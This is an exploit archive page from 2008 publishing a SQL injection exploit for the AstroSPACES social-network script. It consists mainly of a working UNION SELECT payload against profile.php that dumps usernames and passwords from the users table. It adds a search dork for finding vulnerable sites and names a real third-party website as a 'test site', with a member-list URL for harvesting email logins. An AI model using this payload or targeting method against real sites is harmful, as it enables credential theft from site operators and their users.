[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AstroSPACES (id) Remote SQL Injection Vulnerability
# Published : 2008-10-15
# Author : TurkishWarriorr
# Previous Title : Post Affiliate Pro 2.0 (index.php md) Local File Inclusion Vulnerability
# Next Title : myStats (hits.php) Multiple Remote Vulnerabilities Exploit
# AstroSPACES (profile.php) SQL
Powered by Philippine Website Developers and AstroSPACES ?? P3NET 2006-2007
#########################################################################
#
# AUTHOR : TurkishWarriorr (Sehitler ?–lmez Vatan B??l??nmez ....)
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORK : Powered By AstroSPACES
#
##########################################################################
EXPLOIT :
profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--
test sites:
http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--
E mail login :
http://quirino.com.ph/friendster/space.php?action=memberlist
##########################################################################
www.1923turk.org
turkish-warriorr@hotmail.com
# www.Syue.com [2008-10-15]